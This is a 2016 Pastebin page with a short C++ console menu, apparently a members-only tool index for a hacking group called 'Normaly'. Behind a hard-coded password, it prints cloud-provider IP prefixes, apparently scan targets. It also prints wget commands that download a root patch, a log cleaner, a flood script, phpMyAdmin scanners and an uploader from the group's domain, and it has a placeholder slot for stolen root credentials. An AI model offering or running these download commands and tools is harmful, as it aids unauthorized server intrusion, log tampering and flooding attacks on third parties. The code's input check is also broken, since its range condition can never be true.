Advertisement
ikogames

Untitled

Oct 26th, 2016
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.90 KB | None | 0 0
  1. #include <iostream>
  2. #include <stdlib.h>
  3. #include <cstring>
  4. #include <string>
  5.  
  6. using namespace std;
  7.  
  8. int main()
  9. {
  10. int password, menu1, ip;
  11. system("title Normaly Project v1.0.0");
  12. system("color a");
  13. cout<<"Welcome to Normaly Member Only Project v1.0.0 ."<<endl;
  14. cout<<"Do not share this project ."<<endl;
  15. cout<<"Make by Fashion@Normaly.tk"<<endl;
  16. cout<<"Enter password : "; cin>>password;
  17. if(password == 2482016)
  18. {
  19. cout<<"You have been logged."<<endl;
  20. cout<<"Welcome to normaly."<<endl;
  21. cout<<"1 = List of ip "<<endl;
  22. cout<<"2 = Wget of arhives "<<endl;
  23. cout<<"3 = Random root , don;t change password or you will got kick ."<<endl;
  24. cout<<"4 = Information"<<endl;
  25. cout<<"5 = Anti-Flood/IP Changer."<<endl;
  26. cout<<"Enter number of line (from 1 to 5) : "; cin>>menu1;
  27.  
  28. if(menu1 > 5 && menu1 < 1)
  29. cout<<"You wrote a wrong number."<<endl;
  30. else if(menu1 == 1)
  31. {
  32. system("title Normaly Project v1.0.0/IP List");
  33. cout<<"List of ip. "<<endl;
  34. cout<<"1 = Amazon ip."<<endl;
  35. cout<<"2 = DigitalOcean ip."<<endl;
  36. cout<<"3 = ChinaTelecom ip."<<endl;
  37. cout<<"4 = OVH SAS ip."<<endl;
  38. cout<<"5 = BlazingFast ip."<<endl;
  39. cout<<"Enter number of line (from 1 to 5) : "; cin>>ip;
  40. if(ip > 5 && ip < 1)
  41. cout<<"You wrote a wrong number."<<endl;
  42. else if(ip == 1)
  43. {
  44. cout<<"Amazon IP list:"<<endl;
  45. cout<<"52.90 , 52.67 , 52.0 , 54.211 , 54.242 , 54.243 , 52.84."<<endl;
  46. }
  47. else if(ip == 2)
  48. {
  49. cout<<"DigitalOcean IP list:"<<endl;
  50. cout<<"188.166."<<endl;
  51. }
  52. else if(ip == 3)
  53. {
  54. cout<<"ChinaTelecom IP list:"<<endl;
  55. cout<<"120.27."<<endl;
  56. }
  57. else if(ip == 4)
  58. {
  59. cout<<"OVH SAS IP list:"<<endl;
  60. cout<<"192.99."<<endl;
  61. }
  62. else if(ip == 5)
  63. {
  64. cout<<"BlazingFast IP list:"<<endl;
  65. cout<<"185.."<<endl;
  66.  
  67. }
  68. }
  69. else if(menu1 == 2)
  70. {
  71. system("title Normaly Project v1.0.0/Wget Arhives");
  72. cout<<"Wget arhives :"<<endl;
  73. cout<<"NewRootV2 Pach arhive : wget www.normaly.tk/newrootv2"<<endl;
  74. cout<<"SystemInfo arhive : wget www.normaly.tk/normalyinfo"<<endl;
  75. cout<<"ClearLog arhive : wget www.normaly.tk/normalysoap"<<endl;
  76. cout<<"Network speed arhive : wget www.normaly.tk/test.py"<<endl;
  77. cout<<"Flood arhive : wget www.normaly.tk/normaly.pl"<<endl;
  78. cout<<"Mix scan arhive : wget www.normaly.tk/mix.zip"<<endl;
  79. cout<<"Gosh arhive : wget www.normaly.tk/gozh.zip"<<endl;
  80. cout<<"PMA scan arhive : wget www.normaly.tk/pma.zip"<<endl;
  81. cout<<"Upload PMA arhive : wget www.normaly.tk/uploadpma.zip"<<endl;
  82. }
  83. else if(menu1 == 3)
  84. {
  85. system("title Normaly Project v1.0.0/Random Root");
  86. cout<<"Random Root."<<endl;
  87. cout<<"OK:ip:user:password"<<endl;
  88. cout<<"OK:ip:user:password"<<endl;
  89.  
  90. }
  91. else if(menu1 == 4)
  92. {
  93. system("title Normaly Project v1.0.0/Information");
  94. cout<<"Information: "<<endl;
  95. cout<<"Owner of Normaly is Fashion "<<endl;
  96. cout<<"Contact skype : fashion.play12 "<<endl;
  97. cout<<"Last update: 10/24/2016 "<<endl;
  98. }
  99. else if(menu1 == 5)
  100. {
  101. system("title Normaly Project v1.0.0/IP Changer");
  102. cout<<"Anti-Flood/IP Changer"<<endl;
  103. system("echo off");
  104. system("cls");
  105. system("ipconfig /release");
  106. system("ipconfig /renew");
  107. system("ipconfig /registerdns");
  108. system("exit");
  109. cout<<"Your ip has benn changed"<<endl;
  110. }
  111. }
  112. else
  113. cout<<"You aren't normaly member."<<endl;
  114.  
  115. return 0;
  116. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement